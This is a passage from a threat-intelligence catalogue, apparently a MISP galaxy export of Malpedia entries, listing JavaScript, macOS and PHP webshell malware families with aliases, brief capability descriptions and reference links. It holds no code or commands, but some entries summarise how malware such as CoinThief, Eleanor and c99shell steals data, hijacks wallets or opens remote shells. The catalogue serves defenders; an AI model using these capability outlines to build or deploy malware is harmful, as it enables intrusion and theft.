Unidentified JS 006 (Winter Wyvern) is also known as:

Table 2598. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_006

https://www.welivesecurity.com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/

Unidentified JS 002

The tag is: misp-galaxy:malpedia="Unidentified JS 002"

Unidentified JS 002 is also known as:

Table 2599. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_js_002

Valak

According to PCrisk, Valak is malicious software that downloads JScript files and executes them. What happens next depends on the actions performed by the executed JScript files. It is very likely that cyber criminals behind Valak attempt to use this malware to cause chain infections (i.e., using Valak to distribute other malware).

Research shows that Valak is distributed through spam campaigns, however, in some cases, it infiltrates systems when they are already infected with malicious program such as Ursnif (also known as Gozi).

The tag is: misp-galaxy:malpedia="Valak"

Valak is also known as:

  • Valek

Table 2600. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.valak

https://unit42.paloaltonetworks.com/valak-evolution/

https://cocomelonc.github.io/malware/2023/07/26/malware-tricks-35.html

https://threatresearch.ext.hp.com/detecting-ta551-domains/

https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/

https://security-soup.net/analysis-of-valak-maldoc/

https://www.cybereason.com/blog/valak-more-than-meets-the-eye

https://twitter.com/malware_traffic/status/1207824548021886977

https://unit42.paloaltonetworks.com/atoms/monsterlibra/

https://blog.talosintelligence.com/2020/07/valak-emerges.html

https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/

https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7

witchcoven

The tag is: misp-galaxy:malpedia="witchcoven"

witchcoven is also known as:

Table 2601. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/js.witchcoven

https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf

3CX Backdoor (OS X)

The tag is: misp-galaxy:malpedia="3CX Backdoor (OS X)"

3CX Backdoor (OS X) is also known as:

Table 2603. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.3cx_backdoor

https://objective-see.org/blog/blog_0x74.html

https://objective-see.org/blog/blog_0x73.html

AppleJeus (OS X)

According to PcRisk AppleJeus is the name of backdoor malware that was distributed by the Lazarus group. They spread this malicious software through a fake app disguised as a cryptocurrency trading application called Celas Trade Pro.

The tag is: misp-galaxy:malpedia="AppleJeus (OS X)"

AppleJeus (OS X) is also known as:

Table 2605. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56

https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/

https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf

https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/

https://securelist.com/operation-applejeus-sequel/95596/

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment

https://objective-see.com/blog/blog_0x5F.html

https://us-cert.cisa.gov/ncas/alerts/aa21-048a

https://www.youtube.com/watch?v=rjA0Vf75cYk

https://objective-see.com/blog/blog_0x49.html

https://vblocalhost.com/uploads/VB2021-Park.pdf

https://objective-see.com/blog/blog_0x54.html

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d

https://www.youtube.com/watch?v=1NkzTKkEM2k

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e

https://securelist.com/operation-applejeus/87553/

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://securelist.com/apt-trends-report-q2-2020/97937/

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c

Careto

The tag is: misp-galaxy:malpedia="Careto"

Careto is also known as:

  • Appetite

  • Mask

Table 2608. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto

https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed

CDDS

Google TAG has observed this malware being delivered via watering hole attacks using 0-day exploits, targeting visitors to Hong Kong websites for a media outlet and a prominent pro-democracy labor and political group.

The tag is: misp-galaxy:malpedia="CDDS"

CDDS is also known as:

  • Macma

Table 2610. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.cdds

https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/

https://objective-see.com/blog/blog_0x69.html

https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macma/

CoinThief

CoinThief was a malware package designed to steal Bitcoins from the victim, consisting of a binary patcher, browser extensions, and a backdoor component.

It was spreading in early 2014 from several different sources: - on Github (where the trojanized compiled binary didn’t match the displayed source code), o - on popular and trusted download sites line CNET’s Download.com or MacUpdate.com, and - as cracked applications via torrents camouflaged as Bitcoin Ticker TTM, BitVanity, StealthBit, Litecoin Ticker, BBEdit, Pixelmator, Angry Birds and Delicious Library.

The patcher‘s role was to locate and modify legitimate versions of the Bitcoin-Qt wallet application. The analyzed malware samples targeted versions of Bitcoin-Qt 0.8.1, 0.8.0 and 0.8.5. The earlier patch modified Bitcoin-Qt adding malicious code that would send nearly all the victim’s Bitcoins to one of the hard-coded addresses belonging to the attacker.

The browser extensions targeted Chrome and Firefox and are disguised as a “Pop-up blocker”. The extensions monitored visited websites, download malicious JavaScripts and injected them into various Bitcoin-related websites (mostly Bitcoin exchanges and online wallet sites). The injected JS scripts were able to modify transactions to redirect Bitcoin transfers to an attacker’s address or simply harvest login credentials to the targeted online service.

The backdoor enabled the attacker to take full control over the victim’s computer: - collect information about the infected computer - execute arbitrary shell scripts on the target computer - upload an arbitrary file from the victim’s hard drive to a remote server - update itself to a newer version

The tag is: misp-galaxy:malpedia="CoinThief"

CoinThief is also known as:

Table 2613. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief

https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed

https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/

Coldroot RAT

The tag is: misp-galaxy:malpedia="Coldroot RAT"

Coldroot RAT is also known as:

Table 2614. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat

https://objective-see.com/blog/blog_0x2A.html

https://objectivebythesea.com/v2/talks/OBTS_v2_Seele.pdf

Convuster

The tag is: misp-galaxy:malpedia="Convuster"

Convuster is also known as:

Table 2615. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.convuster

https://securelist.com/convuster-macos-adware-in-rust/101258/

CpuMeaner

The tag is: misp-galaxy:malpedia="CpuMeaner"

CpuMeaner is also known as:

Table 2616. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.cpumeaner

https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/

Dacls (OS X)

According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.

Research shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.

The tag is: misp-galaxy:malpedia="Dacls (OS X)"

Dacls (OS X) is also known as:

Table 2620. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.dacls

https://objective-see.com/blog/blog_0x5F.html

https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability

https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/

https://objective-see.com/blog/blog_0x57.html

https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/

https://www.sygnia.co/mata-framework

https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/

https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://securelist.com/apt-trends-report-q2-2020/97937/

https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/

Dummy

The tag is: misp-galaxy:malpedia="Dummy"

Dummy is also known as:

Table 2624. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy

https://objective-see.com/blog/blog_0x32.html

Eleanor

Eleanor comes as a drag-and-drop file utility called EasyDoc Converter. This application bundle wraps a shell script that uses Dropbox name as a disguise and installs three components: a hidden Tor service, a Pastebin agent and a web service with a PHP-based graphical interface.

The Tor service transforms the victim’s computer into a server that provides attackers with full anonymous access to the infected machine via Tor-generated address.

The Pastebin agent uploads the address in encrypted form to the Pastebin website where the attackers can obtain it.

The web service is the main malicious component that provides the attackers with the control over the infected machine. After successful authentication, the interface offers several control panels to the attackers, allowing them to do the following actions:

  • Managing files

  • Listing processes

  • Connecting to various database management systems such as MySQL or SQLite

  • Connecting via bind/reverse shell

  • Executing shell command

  • Capturing and browsing images and videos from the victim’s webcam

  • Sending emails with an attachment

The tag is: misp-galaxy:malpedia="Eleanor"

Eleanor is also known as:

Table 2625. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor

https://labs.bitdefender.com/2016/07/new-mac-backdoor-nukes-os-x-systems/

ElectroRAT

According to PCrisk, ElectroRAT is a Remote Access Trojan (RAT) written in the Go programming language and designed to target Windows, MacOS, and Linux users. Cyber criminals behind ElectroRAT target mainly cryptocurrency users. This RAT is distributed via the trojanized Jamm, eTrader, and DaoPoker applications.

The tag is: misp-galaxy:malpedia="ElectroRAT"

ElectroRAT is also known as:

Table 2626. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.electro_rat

https://objective-see.com/blog/blog_0x61.html

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

https://www.intezer.com/blog/research/operation-electrorat-attacker-creates-fake-companies-to-drain-your-crypto-wallets/

EvilOSX

The tag is: misp-galaxy:malpedia="EvilOSX"

EvilOSX is also known as:

Table 2627. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx

https://github.com/Marten4n6/EvilOSX

https://twitter.com/JohnLaTwC/status/966139336436498432

EvilQuest

According to PcRisk, EvilQuest (also known as ThiefQuest) is like many other malicious programs of this type - it encrypts files and creates a ransom message. In most cases, this type of malware modifies the names of encrypted files by appending certain extensions, however, this ransomware leaves them unchanged.

It drops the "READ_ME_NOW.txt" in each folder that contains encrypted data and displays another ransom message in a pop-up window. Additionally, this malware is capable of detecting if certain files are stored on the computer, operates as a keylogger, and receives commands from a Command & Control server.

The tag is: misp-galaxy:malpedia="EvilQuest"

EvilQuest is also known as:

  • ThiefQuest

Table 2628. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilquest

https://www.bleepingcomputer.com/news/security/evilquest-wiper-uses-ransomware-cover-to-steal-files-from-macs/

https://objective-see.com/blog/blog_0x5F.html

https://github.com/gdbinit/evilquest_deobfuscator

https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities

https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://twitter.com/dineshdina04/status/1277668001538433025

https://objective-see.com/blog/blog_0x59.html

https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/

https://www.sentinelone.com/labs/defeating-macos-malware-anti-analysis-tricks-with-radare2/

FailyTale

The tag is: misp-galaxy:malpedia="FailyTale"

FailyTale is also known as:

Table 2629. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.failytale

https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/

FULLHOUSE

Fullhouse (AKA FULLHOUSE.DOORED) is a custom backdoor used by subsets of the North Korean Lazarus Group. Fullhouse is written in C/C++ and includes the capabilities of a tunneler and backdoor commands support such as shell command execution, file transfer, file managment, and process injection. C2 communications occur via HTTP and require configuration through the command line or a configuration file.

The tag is: misp-galaxy:malpedia="FULLHOUSE"

FULLHOUSE is also known as:

Table 2633. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.fullhouse

https://www.mandiant.com/resources/blog/north-korea-supply-chain

GIMMICK (OS X)

This multi-platform malware is a ObjectiveC written macOS variant dubbed GIMMICK by Volexity. This malware is a file-based C2 implant used by Storm Cloud.

The tag is: misp-galaxy:malpedia="GIMMICK (OS X)"

GIMMICK (OS X) is also known as:

Table 2634. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.gimmick

https://cybersecuritynews.com/gimmick-malware-attacks/

https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/

Gmera

According to PCrisk, GMERA (also known as Kassi trojan) is malicious software that disguises itself as Stockfolio, a legitimate trading app created for Mac users.

Research shows that there are two variants of this malware, one detected as Trojan.MacOS.GMERA.A and the other as Trojan.MacOS.GMERA.B. Cyber criminals proliferate GMERA to steal various information and upload it to a website under their control. To avoid damage caused by this malware, remove GMERA immediately.

The tag is: misp-galaxy:malpedia="Gmera"

Gmera is also known as:

  • Kassi

  • StockSteal

Table 2635. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.gmera

https://objective-see.com/blog/blog_0x53.html

https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/

https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/

HiddenLotus

According to Malwarebytes, The HiddenLotus "dropper" is an application named Lê Thu Hà (HAEDC).pdf, using an old trick of disguising itself as a document - in this case, an Adobe Acrobat file.

The tag is: misp-galaxy:malpedia="HiddenLotus"

HiddenLotus is also known as:

Table 2636. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus

https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/

HLOADER

The tag is: misp-galaxy:malpedia="HLOADER"

HLOADER is also known as:

Table 2637. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.hloader

https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn

iMuler

The threat was a multi-stage malware displaying a decoy that appeared to the victim as a Chinese language article on the long-running dispute over the Diaoyu Islands; an array of erotic pictures; or images of Tibetan organisations. It consisted of two stages: Revir was the dropper/downloader and Imuler was the backdoor capable of the following operations:

  • capture screenshots

  • exfiltrate files to a remote computer

  • send various information about the infected computer

  • extract ZIP archive

  • download files from a remote computer and/or the Internet

  • run executable files

The tag is: misp-galaxy:malpedia="iMuler"

iMuler is also known as:

  • Revir

Table 2638. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler

https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/

http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html

https://www.welivesecurity.com/2012/03/16/osximuler-updated-still-a-threat-on-mac-os-x/

JokerSpy

The tag is: misp-galaxy:malpedia="JokerSpy"

JokerSpy is also known as:

Table 2641. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.jokerspy

https://www.elastic.co/security-labs/inital-research-of-jokerspy

KANDYKORN

The tag is: misp-galaxy:malpedia="KANDYKORN"

KANDYKORN is also known as:

Table 2642. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.kandykorn

https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn

Kitmos

The tag is: misp-galaxy:malpedia="Kitmos"

Kitmos is also known as:

  • KitM

Table 2645. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.kitmos

https://www.f-secure.com/weblog/archives/00002558.html

Lambert (OS X)

The tag is: misp-galaxy:malpedia="Lambert (OS X)"

Lambert (OS X) is also known as:

  • GreenLambert

Table 2648. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.lambert

https://objective-see.com/blog/blog_0x68.html

MacInstaller

The tag is: misp-galaxy:malpedia="MacInstaller"

MacInstaller is also known as:

Table 2653. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.macinstaller

https://objective-see.com/blog/blog_0x16.html

MacSpy

The tag is: misp-galaxy:malpedia="MacSpy"

MacSpy is also known as:

Table 2655. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.macspy

https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service

MacVX

The tag is: misp-galaxy:malpedia="MacVX"

MacVX is also known as:

Table 2656. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.macvx

https://objective-see.com/blog/blog_0x16.html

MaMi

The tag is: misp-galaxy:malpedia="MaMi"

MaMi is also known as:

Table 2657. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.mami

https://objective-see.com/blog/blog_0x26.html

Mughthesec

The tag is: misp-galaxy:malpedia="Mughthesec"

Mughthesec is also known as:

Table 2660. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.mughthesec

https://objective-see.com/blog/blog_0x20.html

NetWire

The tag is: misp-galaxy:malpedia="NetWire"

NetWire is also known as:

Table 2661. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.netwire

https://www.intego.com/mac-security-blog/fbi-shuts-down-11-year-old-netwire-rat-malware/

OceanLotus

According to PcRisk, Research shows that the OceanLotus 'backdoor' targets MacOS computers. Cyber criminals behind this backdoor have already used this malware to attack human rights and media organizations, some research institutes, and maritime construction companies.

The OceanLotus backdoor is distributed via a fake Adobe Flash Player installer and a malicious Word document (it is likely that threat authors distribute the document via malspam emails).

The tag is: misp-galaxy:malpedia="OceanLotus"

OceanLotus is also known as:

Table 2662. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus

https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries

https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam

https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update

https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/

https://tradahacking.vn/%C4%91%E1%BB%A3t-r%E1%BB%93i-t%C3%B4i-c%C3%B3-%C4%91%C4%83ng-m%E1%BB%99t-status-xin-d%E1%BA%A1o-tr%C3%AAn-fb-may-qu%C3%A1-c%C5%A9ng-c%C3%B3-v%C3%A0i-b%E1%BA%A1n-nhi%E1%BB%87t-t%C3%ACnh-g%E1%BB%ADi-cho-537b19ee3468

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html

https://about.fb.com/news/2020/12/taking-action-against-hackers-in-bangladesh-and-vietnam/

https://www.trendmicro.com/en_us/research/20/k/new-macos-backdoor-connected-to-oceanlotus-surfaces.html

https://www.welivesecurity.com/2019/04/09/oceanlotus-macos-malware-update/

https://labs.sentinelone.com/apt32-multi-stage-macos-trojan-innovates-on-crimeware-scripting-technique/

https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/

OSAMiner

The tag is: misp-galaxy:malpedia="OSAMiner"

OSAMiner is also known as:

Table 2665. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.osaminer

https://labs.sentinelone.com/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/

Patcher

This crypto-ransomware for macOS was caught spreading via BitTorrent distribution sites in February 2017, masquerading as 'Patcher', an application used for pirating popular software like Adobe Premiere Pro or Microsoft Office for Mac.

The downloaded torrent contained an application bundle in the form of a single zip file. After launching the fake application, the main window of the fake cracking tool was displayed.

The file encryption process was launched after the misguided victim clicked 'Start'. Once executed, the ransomware generated a random 25-character string and set it as the key for RC4 encryption of all of the user’s files. It then demanded ransom in Bitcoin, as instructed in the 'README!' .txt file copied all over the user’s directories.

Despite the instructions being quite thorough, Patcher lacked the functionality to communicate with any C&C server, and therefore made it impossible for its operators to decrypt affected files. The randomly generated encryption key was also too long to be guessed via a brute-force attack, leaving the encrypted data unrecoverable in a reasonable amount of time.

The tag is: misp-galaxy:malpedia="Patcher"

Patcher is also known as:

  • FileCoder

  • Findzip

Table 2666. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher

http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/

PintSized

Backdoor as a fork of OpenSSH_6.0 with no logging, and “-P” and “-z” hidden command arguments. “PuffySSH_5.8p1” string.

The tag is: misp-galaxy:malpedia="PintSized"

PintSized is also known as:

Table 2667. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.pintsized

https://eromang.zataz.com/2013/03/24/osx-pintsized-backdoor-additional-details/

Poseidon (OS X)

Part of Mythic C2, written in Golang.

The tag is: misp-galaxy:malpedia="Poseidon (OS X)"

Poseidon (OS X) is also known as:

Table 2670. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.poseidon

https://github.com/MythicAgents/poseidon

Pwnet

Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.

The tag is: misp-galaxy:malpedia="Pwnet"

Pwnet is also known as:

Table 2672. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet

https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/

Dok

Dok a.k.a. Retefe is the macOS version of the banking trojan Retefe. It consists of a codesigned Mach-O dropper usually malspammed in an app bundle within a DMG disk image, posing as a document. The primary purpose of the dropper is to install a Tor client as well as a malicious CA certificate and proxy pac URL, in order to redirect traffic to targeted sites through their Tor node, effectively carrying out a MITM attack against selected web traffic. It also installs a custom hosts file to prevent access to Apple and VirusTotal. The macOS version shares its MO, many TTPs and infrastructure with the Windows counterpart.

The tag is: misp-galaxy:malpedia="Dok"

Dok is also known as:

  • Retefe

Table 2673. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe

https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/

https://www.govcert.admin.ch/blog/33/the-retefe-saga

http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/

https://www.proofpoint.com/us/threat-insight/post/2019-return-retefe

Silver Sparrow

According to Red Canary, Silver Sparrow is an activity cluster that includes a binary compiled to run on Apple’s new M1 chips but has been distributed without payload so far.

The tag is: misp-galaxy:malpedia="Silver Sparrow"

Silver Sparrow is also known as:

Table 2676. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.silver_sparrow

https://redcanary.com/blog/clipping-silver-sparrows-wings/#technical-analysis

https://resource.redcanary.com/rs/003-YRU-314/images/2022_ThreatDetectionReport_RedCanary.pdf

SimpleTea (OS X)

SimpleTea is a RAT for macOS that is based on the same object-oriented project as SimpleTea for Linux (SimplexTea).

It also shares similarities with POOLRAT (also known as SIMPLESEA), like the supported commands or a single-byte XOR encryption of its configuration. However, the indices of commands are different.

SimpleTea for macOS was uploaded to VirusTotal from Hong Kong and China in September 2023.

The tag is: misp-galaxy:malpedia="SimpleTea (OS X)"

SimpleTea (OS X) is also known as:

Table 2677. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.simpletea

https://web-assets.esetstatic.com/wls/en/papers/threat-reports/eset-apt-activity-report-q2-2023-q3-2023.pdf

SUGARLOADER

The tag is: misp-galaxy:malpedia="SUGARLOADER"

SUGARLOADER is also known as:

Table 2678. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.sugarloader

https://www.elastic.co/security-labs/elastic-catches-dprk-passing-out-kandykorn

Tsunami (OS X)

The tag is: misp-galaxy:malpedia="Tsunami (OS X)"

Tsunami (OS X) is also known as:

Table 2681. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.tsunami

https://www.intego.com/mac-security-blog/tsunami-backdoor-can-be-used-for-denial-of-service-attacks

Winnti (OS X)

The tag is: misp-galaxy:malpedia="Winnti (OS X)"

Winnti (OS X) is also known as:

Table 2688. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti

https://401trg.pw/winnti-evolution-going-open-source/

Xloader

Xloader is a Rebranding of Formbook malware (mainly a stealer), available for macOS as well.

Formbook has a "magic"-value FBNG (FormBook-NG), while Xloader has a "magic"-value XLNG (XLoader-NG). This "magic"-value XLNG is platform-independent.

Not to be confused with apk.xloader or ios.xloader.

The tag is: misp-galaxy:malpedia="Xloader"

Xloader is also known as:

  • Formbook

Table 2693. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.xloader

https://research.checkpoint.com/2022/xloader-botnet-find-me-if-you-can/

https://www.vmray.com/cyber-security-blog/malware-analysis-spotlight-xbinder-xloader/

https://research.checkpoint.com/2021/time-proven-tricks-in-a-new-environment-the-macos-evolution-of-formbook/

https://blogs.blackberry.com/en/2021/09/threat-thursday-xloader-infostealer

https://twitter.com/krabsonsecurity/status/1319463908952969216

https://www.lac.co.jp/lacwatch/report/20220307_002893.html

https://www.sentinelone.com/blog/xloaders-latest-trick-new-macos-variant-disguised-as-signed-officenote-app/

https://malwarebookreports.com/cross-platform-java-dropper-snake-and-xloader-mac-version/

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://research.checkpoint.com/2021/top-prevalent-malware-with-a-thousand-campaigns-migrates-to-macos/

https://www.sentinelone.com/blog/detecting-xloader-a-macos-malware-as-a-service-info-stealer-and-keylogger/

https://blog.malwarebytes.com/mac/2021/07/osx-xloader-hides-little-except-its-main-purpose-what-we-learned-in-the-installation-process/

https://www.zscaler.com/blogs/security-research/analysis-xloaders-c2-network-encryption

ZuRu

A malware that was observed being embedded alongside legitimate applications (such as iTerm2) offered for download on suspicious websites pushed in search engines. It uses a Python script to perform reconnaissance on the compromised system an pulls additional payload(s).

The tag is: misp-galaxy:malpedia="ZuRu"

ZuRu is also known as:

Table 2696. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/osx.zuru

https://www.trendmicro.com/en_us/research/21/i/mac-users-targeted-by-trojanized-iterm2-app.html

https://objective-see.com/blog/blog_0x66.html

Ani-Shell

Ani-Shell is a simple PHP shell with some unique features like Mass Mailer, a simple Web-Server Fuzzer, Dosser, Back Connect, Bind Shell, Back Connect, Auto Rooter etc.

The tag is: misp-galaxy:malpedia="Ani-Shell"

Ani-Shell is also known as:

  • anishell

Table 2697. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.anishell

http://ani-shell.sourceforge.net/

https://github.com/tennc/webshell/tree/master/php/Ani-Shell

c99shell

C99shell is a PHP backdoor that provides a lot of functionality, for example:

  • run shell commands;

  • download/upload files from and to the server (FTP functionality);

  • full access to all files on the hard disk;

  • self-delete functionality.

The tag is: misp-galaxy:malpedia="c99shell"

c99shell is also known as:

  • c99

Table 2701. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.c99

https://bartblaze.blogspot.com/2015/03/c99shell-not-dead.html

DEWMODE

FireEye discovered the DEWMODE webshell starting mid-December 2020 after exploitation of zero-day vulnerabilities in Accellion’s File Transfer Appliance. It is a PHP webshell that allows threat actors to view and download files in the victim machine. It also contains cleanup function to remove itself and clean the Apache log.

The tag is: misp-galaxy:malpedia="DEWMODE"

DEWMODE is also known as:

Table 2702. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode

https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html

https://go.recordedfuture.com/hubfs/reports/mtp-2021-0312.pdf

https://www.accellion.com/sites/default/files/trust-center/accellion-fta-attack-mandiant-report-full.pdf

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-055a

Ensikology

The tag is: misp-galaxy:malpedia="Ensikology"

Ensikology is also known as:

  • Ensiko

Table 2703. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.ensikology

https://blog.trendmicro.com/trendlabs-security-intelligence/ensiko-a-webshell-with-ransomware-capabilities/

p0wnyshell

The tag is: misp-galaxy:malpedia="p0wnyshell"

p0wnyshell is also known as:

  • Ponyshell

  • Pownyshell

Table 2704. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.p0wnyshell

https://www.microsoft.com/en-us/security/blog/2023/06/14/cadet-blizzard-emerges-as-a-novel-and-distinct-russian-threat-actor/

Parrot TDS WebShell

In combination with Parrot TDS the usage of a classical web shell was observed by DECODED Avast.io.

The tag is: misp-galaxy:malpedia="Parrot TDS WebShell"

Parrot TDS WebShell is also known as:

Table 2705. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.parrot_tds_shell

https://decoded.avast.io/janrubin/parrot-tds-takes-over-web-servers-and-threatens-millions/

Prometheus Backdoor

Backdoor written in php

The tag is: misp-galaxy:malpedia="Prometheus Backdoor"

Prometheus Backdoor is also known as:

Table 2707. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/php.prometheus_backdoor

https://blog.group-ib.com/prometheus-tds

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

RedHat Hacker WebShell

